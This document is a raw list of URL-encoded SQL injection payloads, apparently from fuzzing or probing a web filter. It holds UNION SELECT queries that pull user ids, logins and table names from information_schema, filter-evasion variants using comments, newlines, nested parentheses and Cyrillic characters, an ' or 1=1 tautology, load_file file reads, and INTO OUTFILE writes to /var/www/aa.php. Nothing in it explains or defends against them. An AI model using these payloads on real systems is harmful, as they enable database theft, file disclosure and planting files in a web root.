%28select%20substr%20%28id%2C%40a%2C%40v%29%20from%20users%20limit%201%2C1%29
%28select%20login/2%20from%20users%20limit%201%2C1%29
%28select%20login/2%20%0D%0A%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x00%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x30%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x3%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-0union%20%28select%20id%20from%20users%20limit%201%2C1%29
-union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-.1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20table_name%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C1%0D%0A%2C%0D%0A2%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C%0D%0A%0D%0A1%0D%0A%0D%0A%2C%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A1%0D%0A%29%0D%0Afrom%20users%20limit%201%2C1%29
%28select%20substr%0D%0A%28login%0D%0A%2C
%28select%20substr%28login%0D%0A%29
%28select%20substr%28login%29
%28select%20substr%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
##%28select%20asd%28login%29%0D%0Afrom%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
/%2A%20BAR%20%2A/%20UNION%20ALL%20SELECT%20%282%2C3%2C4%29
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
-999.9%27%20UNION%20ALL%20SELECT%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x
%27%20or%201%3D1%20or%20%27
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
0x1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27foo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
a%0D%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
id%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%201%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20xxx%20from%20users%20limit%201%2C1%29
oo%27%20%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%27%22%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%231aaaaa%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%231a%23%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%231a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23--1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23--%20-1a%0A%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
xxx%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
%27s%27%20union%20%28select%201%20from%20users%20limit%201%2C1%29
-1%20union%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%20union%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20union
-1%20union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23union%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%23%0Aunion%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23union%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23feafafeas%0A%23%20union%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20%23feafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--eafafeas%0Aunion%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--eafafeas%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20%28select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20union%28%20select%20id%20from%20users%20limit%201%2C1%29
-1%20--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20id%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20table_name%20from%20users%20limit%201%2C1%29%29
-1--%0A%20%28union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20all%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%23%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20select%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0Cselect%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0C%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%0C-%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%20%23%28%0A%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0A%20union%28%20select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1--%0D%0A%20union%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29
-1--%0D%0A%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27union%20select%20us3rs%20from%20table1
%27-%40aa1-%40a%20union%20select%20us3rs%20from%20table1
%27-%40%D1%84%D1%84%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27-%40UNION1-%40a%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841-%40%D0%B0%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%40a1%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841-%40a%20union%20select%20us3rs%20from%20table1
%27-%40a2-%40a3%5E%40a3%20union%20select%20us3rs%20from%20table1
%27-%40a2-%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
%27-%40a2%5E%40a3%5E%40a3-%40a5%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
%27-%401%20union%20select%20us3rs%20from%20table1
%27-%401%20union%20select%20us3rs%20from%20table1
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
-1%20union%28%28%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28select-table_name%20from%20information_schema.tables%20limit%201%2C1%29%29%29
%27-%40%D1%841%20union%20select%20us3rs%20from%20table1
-1%20union%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29
-1%20union%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29
-1%20union%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
%27-%40a1%20union%20select%20us3rs%20from%20table1
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%23%20union%20%20%20%0D%0A%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
#-1%23%0D%0A%23%20union%20%20%20%0D%0Aun%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%28%28%28%28%20%28%28%28%28%20%20%20%20%20%20%20%20%20%20%20%28%28%23fdafdsa%0D%0A%28select%23%28table_name%29%20from%20information_schema.tables%20limit%201%2C1%29%29%29%29%29%29%29%29%29%29%29
-1%23%0D%0A%0D%0Aunion
-1%23%0D%0A%0D%0Aunion%20%23
-1%23%0D%0A%0D%0Aunion%20%23%0D%0A%23
-1%23%0D%0Aunion%20%23%0D%0A%23
-1%23union%20%23%0D%0Aunion
-1%23union%20%23%23%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0Aunion
#-1%23union%20%23%23%0D%0A---%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23unn%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0Aunion%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A--%0D%0A--%0D%0A%23/--%0D%0A/%2A%2A/union%23--%0D%0A%23rfae%0D%0A%23%23union
-1%23union%20%23%23%0D%0A%23/%0D%0A/%2A%2A/union%23--
-1%23union%20%23%23%0D%0A/1/%2A%2A/union%23--
-11/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union%23--
-1/1/%2A%2A/union%23--
1/1/%2A%2A/union%23--
-11/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union
-1%0D%0A/1/%2A%2A/union
-1%0D%0A/1/%2A%2A/union%23
-1%0D%0A/1/%2A%2A/union%23--
-1%0D%0A/1/%2A%2A/union
1/1/%2A%2A/union
%0D%0A1/1/%2A%2A/union
0-%0D%0A1/1/%2A%2A/union
0x1-%0D%0A1/1/%2A%2A/union
0x1%20-%0D%0A1/1/%2A%2A/union
test%27-%0D%0A1/1/%2A%2A/union%20select
test%27-%0D%0A1/1/%2A%2A/union%28select
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%0D%0A1/1/%2A%2A/union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
test%27-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
1-%20%40version%20union%28select%20table_name%20from%20information_schema.tables%20limit%201%2C1%29
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
0-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
%27select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
%27-select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
-1.select/%2A%211%20union%20select%20version%28%29%2A/from%20test%3B
0/%2A%2A/union/%2A%2150000select%2A/table_name%60foo%60/%2A%2A/
select%20load_file%28%27/asd/asd%27%29
select%20load_file%28%27/asd/asd%27%29
select%20load_file%28%27/asd/asd%27%29
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
%27%20into%20outfile%20%27/var/www/aa.php%27%23
%27%20into%20outfile%20%0D%0A%27/var/www/aa.php%27
select%20load_file%28%27/asd/asd%27%29
1%20into%20outfile%20%27asd%27%0D%0A
1%20into%20outfile%20%27asd%27%0D%0A
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
1%20into%20outfile%20%27asd%27%0D%0A
%40%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%D1%841%20%20union%20select%20
%27%20into%20outfile%20%27/var/www/aa.php
%27%20into%20outfile%20%27/var/www/aa.php%27--a-
